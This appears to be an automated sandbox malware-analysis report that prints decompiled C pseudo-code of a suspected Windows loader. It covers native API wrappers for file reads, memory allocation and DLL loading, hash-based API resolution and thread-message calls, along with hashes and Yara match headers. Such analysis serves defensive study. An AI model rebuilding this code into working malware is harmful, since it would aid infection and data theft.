                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction ID: 9925a9467550e1661e90385b3e113a8a5166dd9d538ce8a85aa80a7476eeecee
                            • Opcode Fuzzy Hash: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction Fuzzy Hash: EE31B231A0027AFFDB61EF68C880EAE3FB5FF0121AF1585A8E5698B191D730D944DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E01328F57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t13;
                            				void* _t25;
                            				intOrPtr _t27;
                            				intOrPtr _t29;
                            				void* _t30;
                            				void* _t31;
                            
                            				_t31 = __eflags;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ebx;
                            				_push(0xc);
                            				_push(0x132d7c0);
                            				E01322A5C(__ebx, __edi, __esi);
                            				_t29 = E013252A2(__ebx, _t31);
                            				_t13 =  *0x132fd9c; // 0xfffffffe
                            				if(( *(_t29 + 0x70) & _t13) == 0) {
                            					L6:
                            					E01321F64(_t22, _t25, _t26, 0xc);
                            					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                            					_t8 = _t29 + 0x6c; // 0x6c
                            					_t27 =  *0x132fd88; // 0x132fcb0
                            					 *((intOrPtr*)(_t30 - 0x1c)) = E01328F19(_t8, _t25, _t27);
                            					 *(_t30 - 4) = 0xfffffffe;
                            					E01328FC1();
                            				} else {
                            					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                            					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                            						goto L6;
                            					} else {
                            						_t29 =  *((intOrPtr*)(E013252A2(_t22, _t33) + 0x6c));
                            					}
                            				}
                            				if(_t29 == 0) {
                            					E01322CAC(_t25, 0x20);
                            				}
                            				return E01322AA1(_t29);
                            			}










                            APIs
                            • __getptd.LIBCMT ref: 01328F63
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __getptd.LIBCMT ref: 01328F7A
                            • __amsg_exit.LIBCMT ref: 01328F88
                            • __lock.LIBCMT ref: 01328F98
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction ID: 15dc13205acd01c2ef1072c42dfd1425dea07b4c5d3191b0de69106abc66c636
                            • Opcode Fuzzy Hash: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction Fuzzy Hash: 07F09031940736AFE730BFADA400F4E33F56F10728F144589D650A72D4CB349A05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.8%
                            Total number of Nodes:530
                            Total number of Limit Nodes:73
22909->22918 22911 41a450 LdrLoadDll NtClose 22911->22918 22914 40c4b0 LdrLoadDll NtClose 22914->22918 22917 419de0 LdrLoadDll 22917->22918 22918->22904 22918->22905 22918->22909 22918->22911 22918->22914 22918->22917 22921 419cd0 22918->22921 22924 4085d0 22918->22924 22936 40f5e0 LdrLoadDll NtClose 22918->22936 22937 419d50 LdrLoadDll 22918->22937 22938 419d80 LdrLoadDll 22918->22938 22939 419e10 LdrLoadDll 22918->22939 22940 4083a0 22918->22940 22956 405f60 LdrLoadDll 22918->22956 22920->22876 22922 419cec 22921->22922 22923 41af20 LdrLoadDll 22921->22923 22922->22918 22923->22922 22925 4085e6 22924->22925 22957 419840 22925->22957 22927 4085ff 22932 408771 22927->22932 22978 4081a0 22927->22978 22929 4086e5 22930 4083a0 7 API calls 22929->22930 22929->22932 22931 408713 22930->22931 22931->22932 22933 419ec0 LdrLoadDll 22931->22933 22932->22918 22934 408748 22933->22934 22934->22932 22935 41a4c0 LdrLoadDll 22934->22935 22935->22932 22936->22918 22937->22918 22938->22918 22939->22918 22941 4083c9 22940->22941 23012 408310 22941->23012 22944 41a4c0 LdrLoadDll 22945 4083dc 22944->22945 22945->22944 22946 408467 22945->22946 22948 408462 22945->22948 23020 40f660 22945->23020 22946->22918 22947 41a450 2 API calls 22949 40849a 22947->22949 22948->22947 22949->22946 22950 419cd0 LdrLoadDll 22949->22950 22951 4084ff 22950->22951 22951->22946 23024 419d10 22951->23024 22953 408563 22953->22946 22954 414a40 6 API calls 22953->22954 22955 4085b8 22954->22955 22955->22918 22956->22918 22958 41bf50 2 API calls 22957->22958 22959 419857 22958->22959 22985 409310 22959->22985 22961 419872 22962 4198b0 22961->22962 22963 419899 22961->22963 22966 41bd00 2 API calls 22962->22966 22964 41bd80 2 API calls 22963->22964 22965 4198a6 22964->22965 22965->22927 22967 4198ea 22966->22967 22968 41bd00 2 API calls 22967->22968 22969 419903 22968->22969 22975 419ba4 22969->22975 22991 41bd40 22969->22991 22972 419b90 22973 41bd80 2 API calls 22972->22973 22974 419b9a 22973->22974 
22974->22927 22976 41bd80 2 API calls 22975->22976 22977 419bf9 22976->22977 22977->22927 22979 40829f 22978->22979 22980 4081b5 22978->22980 22979->22929 22980->22979 22981 414a40 6 API calls 22980->22981 22982 408222 22981->22982 22983 41bd80 2 API calls 22982->22983 22984 408249 22982->22984 22983->22984 22984->22929 22986 409335 22985->22986 22987 40ace0 LdrLoadDll 22986->22987 22988 409368 22987->22988 22990 40938d 22988->22990 22994 40cf10 22988->22994 22990->22961 23009 41a540 22991->23009 22995 40cf3c 22994->22995 22996 41a1a0 LdrLoadDll 22995->22996 22997 40cf55 22996->22997 22998 40cf5c 22997->22998 23005 41a1e0 22997->23005 22998->22990 23002 40cf97 23003 41a450 2 API calls 23002->23003 23004 40cfba 23003->23004 23004->22990 23006 40cf7f 23005->23006 23007 41af20 LdrLoadDll 23005->23007 23006->22998 23008 41a7d0 LdrLoadDll 23006->23008 23007->23006 23008->23002 23010 41af20 LdrLoadDll 23009->23010 23011 419b89 23010->23011 23011->22972 23011->22975 23013 408328 23012->23013 23014 40ace0 LdrLoadDll 23013->23014 23015 408343 23014->23015 23016 414e40 LdrLoadDll 23015->23016 23017 408353 23016->23017 23018 40835c PostThreadMessageW 23017->23018 23019 408370 23017->23019 23018->23019 23019->22945 23021 40f673 23020->23021 23029 419e50 23021->23029 23025 419d2c 23024->23025 23026 41af20 LdrLoadDll 23024->23026 23025->22953 23027 41af20 LdrLoadDll 23025->23027 23026->23025 23028 419d6c 23027->23028 23028->22953 23030 419e5a 23029->23030 23031 41af20 LdrLoadDll 23030->23031 23032 40f69e 23031->23032 23032->22945 23034 40f4ee 23033->23034 23035 41af20 LdrLoadDll 23033->23035 23034->22888 23034->22889 23035->23034

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                            C-Code - Quality: 37%
                            			E0041A3D0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                            				void* _t18;
                            				void* _t27;
                            				intOrPtr* _t28;
                            
                            				_t13 = _a4;
                            				_t28 = _a4 + 0xc48;
                            				E0041AF20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                            				_t4 =  &_a40; // 0x414a21
                            				_t6 =  &_a32; // 0x414d62
                            				_t12 =  &_a8; // 0x414d62
                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                            				return _t18;
                            			}







                            APIs
                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !JA$bMA$bMA
                            • API String ID: 2738559852-4222312340
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 231 40ace0-40acfc 232 40ad04-40ad09 231->232 233 40acff call 41cc10 231->233 234 40ad0b-40ad0e 232->234 235 40ad0f-40ad1d call 41d030 232->235 233->232 238 40ad2d-40ad3e call 41b460 235->238 239 40ad1f-40ad2a call 41d2b0 235->239 244 40ad40-40ad54 LdrLoadDll 238->244 245 40ad57-40ad5a 238->245 239->238 244->245
                            C-Code - Quality: 100%
                            			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
                            				char* _v8;
                            				struct _EXCEPTION_RECORD _v12;
                            				struct _OBJDIR_INFORMATION _v16;
                            				char _v536;
                            				void* _t15;
                            				struct _OBJDIR_INFORMATION _t17;
                            				struct _OBJDIR_INFORMATION _t18;
                            				void* _t30;
                            				void* _t31;
                            				void* _t32;
                            
                            				_v8 =  &_v536;
                            				_t15 = E0041CC10( &_v12, 0x104, _a8);
                            				_t31 = _t30 + 0xc;
                            				if(_t15 != 0) {
                            					_t17 = E0041D030(__eflags, _v8);
                            					_t32 = _t31 + 4;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						E0041D2B0( &_v12, 0);
                            						_t32 = _t32 + 8;
                            					}
                            					_t18 = E0041B460(_v8);
                            					_v16 = _t18;
                            					__eflags = _t18;
                            					if(_t18 == 0) {
                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                            						return _v16;
                            					}
                            					return _t18;
                            				} else {
                            					return _t15;
                            				}
                            			}














                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                            • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                            • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 246 41a31a-41a371 call 41af20 NtCreateFile
                            C-Code - Quality: 82%
                            			E0041A31A(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t22;
                            				intOrPtr _t33;
                            
                            				asm("in al, 0x95");
                            				_t33 =  *((intOrPtr*)(__ebx - 0x74aa8a9e));
                            				_t16 = _a4;
                            				_t4 = _t16 + 0xc40; // 0xc40
                            				E0041AF20(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t22;
                            			}






                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: d64fa3819765822cd3263a40e8e4ae7d40bac1ed462ead2d3ad675bf57a2a165
                            • Instruction ID: d373012d45d010d8cb68f1ec5b04cc2f7f3797cca48e3b8bbe75b11df1b0945e
                            • Opcode Fuzzy Hash: d64fa3819765822cd3263a40e8e4ae7d40bac1ed462ead2d3ad675bf57a2a165
                            • Instruction Fuzzy Hash: 4201B2B2201108AFCB18DF98DC85EEB77AABF8C354F158248FA1DD7241C630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 249 41a320-41a336 250 41a33c-41a371 NtCreateFile 249->250 251 41a337 call 41af20 249->251 251->250
                            C-Code - Quality: 100%
                            			E0041A320(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t21;
                            				void* _t31;
                            
                            				_t3 = _a4 + 0xc40; // 0xc40
                            				E0041AF20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t21;
                            			}






                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 252 41a4fa-41a53d call 41af20 NtAllocateVirtualMemory
                            C-Code - Quality: 82%
                            			E0041A4FA(void* __eax, intOrPtr* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t15;
                            				intOrPtr _t29;
                            
                            				asm("out dx, eax");
                            				 *__edi = _t29;
                            				_t11 = _a4;
                            				_t3 = _t11 + 0xc60; // 0xca0
                            				E0041AF20(__edi, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t15;
                            			}






                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 246d36a4a50b9289f1e0a6a461cc62c4a4b3b91b9faffa942a46cc189b6a47af
                            • Instruction ID: 1ed7b12833813d4d0e766ee54224deb5541203d92298c41f70362a7cc4aef1ad
                            • Opcode Fuzzy Hash: 246d36a4a50b9289f1e0a6a461cc62c4a4b3b91b9faffa942a46cc189b6a47af
                            • Instruction Fuzzy Hash: FCF058B2200109AFDB14DF89CC80EEB77AAAF8C354F108109FA0CD7240C630E821CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 255 41a500-41a516 256 41a51c-41a53d NtAllocateVirtualMemory 255->256 257 41a517 call 41af20 255->257 257->256
                            C-Code - Quality: 100%
                            			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t14;
                            				void* _t21;
                            
                            				_t3 = _a4 + 0xc60; // 0xca0
                            				E0041AF20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t14;
                            			}






                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041A450(intOrPtr _a4, void* _a8) {
                            				long _t8;
                            				void* _t11;
                            
                            				_t5 = _a4;
                            				_t2 = _t5 + 0x10; // 0x300
                            				_t3 = _t5 + 0xc50; // 0x40a933
                            				E0041AF20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                            				_t8 = NtClose(_a8); // executed
                            				return _t8;
                            			}






                            APIs
                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00409AA0(intOrPtr _a4) {
                            				intOrPtr _v8;
                            				char _v24;
                            				char _v284;
                            				char _v804;
                            				char _v840;
                            				void* _t24;
                            				void* _t31;
                            				void* _t33;
                            				void* _t34;
                            				void* _t39;
                            				void* _t50;
                            				intOrPtr _t52;
                            				void* _t53;
                            				void* _t54;
                            				void* _t55;
                            				void* _t56;
                            
                            				_t52 = _a4;
                            				_t39 = 0; // executed
                            				_t24 = E00407EA0(_t52,  &_v24); // executed
                            				_t54 = _t53 + 8;
                            				if(_t24 != 0) {
                            					E004080B0( &_v24,  &_v840);
                            					_t55 = _t54 + 8;
                            					do {
                            						E0041BDD0( &_v284, 0x104);
                            						E0041C440( &_v284,  &_v804);
                            						_t56 = _t55 + 0x10;
                            						_t50 = 0x4f;
                            						while(1) {
                            							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
                            							_t56 = _t56 + 0x10;
                            							if(_t31 != 0) {
                            								break;
                            							}
                            							_t50 = _t50 + 1;
                            							if(_t50 <= 0x62) {
                            								continue;
                            							} else {
                            							}
                            							goto L8;
                            						}
                            						_t9 = _t52 + 0x14; // 0xffffe055
                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                            						_t39 = 1;
                            						L8:
                            						_t33 = E004080E0( &_v24,  &_v840);
                            						_t55 = _t56 + 8;
                            					} while (_t33 != 0 && _t39 == 0);
                            					_t34 = E00408160(_t52,  &_v24); // executed
                            					if(_t39 == 0) {
                            						asm("rdtsc");
                            						asm("rdtsc");
                            						_v8 = _t34 - 0 + _t34;
                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                            					}
                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                            					_t20 = _t52 + 0x31; // 0x5608758b
                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                            					return 1;
                            				} else {
                            					return _t24;
                            				}
                            			}




















                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                            • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                            • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                            • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                            C-Code - Quality: 100%
                            			E0041A5F0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                            				void* _t10;
                            				void* _t15;
                            
                            				E0041AF20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                            				_t6 =  &_a8; // 0x414526
                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &EA
                            • API String ID: 1279760036-1330915590
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 201 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                            C-Code - Quality: 63%
                            			E00408308(void* __edx, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t14;
                            				int _t15;
                            				long _t24;
                            				int _t29;
                            				void* _t32;
                            				void* _t34;
                            				signed char _t39;
                            
                            				asm("sbb edi, edi");
                            				asm("std");
                            				asm("hlt");
                            				_t1 = __edx + 0x55;
                            				 *_t1 =  *(__edx + 0x55) << 1;
                            				_t39 =  *_t1;
                            				_t32 = _t34;
                            				_v68 = 0;
                            				E0041BE20( &_v67, 0, 0x3f);
                            				E0041C9C0( &_v68, 3);
                            				_t14 = E0040ACE0(_t39, _a4 + 0x1c,  &_v68); // executed
                            				_t15 = E00414E40(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
                            				_t29 = _t15;
                            				if(_t29 != 0) {
                            					_t24 = _a8;
                            					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                            					_t41 = _t15;
                            					if(_t15 == 0) {
                            						_t15 =  *_t29(_t24, 0x8003, _t32 + (E0040A470(_t41, 1, 8) & 0x000000ff) - 0x40, _t15);
                            					}
                            				}
                            				return _t15;
                            			}













                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: ae062f95abbf2e34a3362aed9973a98173dddafaa68f7340c1eb130177d1f422
                            • Instruction ID: 8e1c76695cc15e715ca50465393cb0f79c0d632a80173a0aba09960ccb057104
                            • Opcode Fuzzy Hash: ae062f95abbf2e34a3362aed9973a98173dddafaa68f7340c1eb130177d1f422
                            • Instruction Fuzzy Hash: 5E01B571A8032877E721A6958C03FFE775C6B41B54F050159FF04BB1C2DAA8690542EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 408310-40831f 217 408328-40835a call 41c9c0 call 40ace0 call 414e40 216->217 218 408323 call 41be20 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                            C-Code - Quality: 82%
                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t12;
                            				intOrPtr* _t13;
                            				int _t14;
                            				long _t21;
                            				intOrPtr* _t25;
                            				void* _t26;
                            				void* _t30;
                            
                            				_t30 = __eflags;
                            				_v68 = 0;
                            				E0041BE20( &_v67, 0, 0x3f);
                            				E0041C9C0( &_v68, 3);
                            				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                            				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                            				_t25 = _t13;
                            				if(_t25 != 0) {
                            					_t21 = _a8;
                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                            					_t32 = _t14;
                            					if(_t14 == 0) {
                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                            					}
                            					return _t14;
                            				}
                            				return _t13;
                            			}













                            APIs
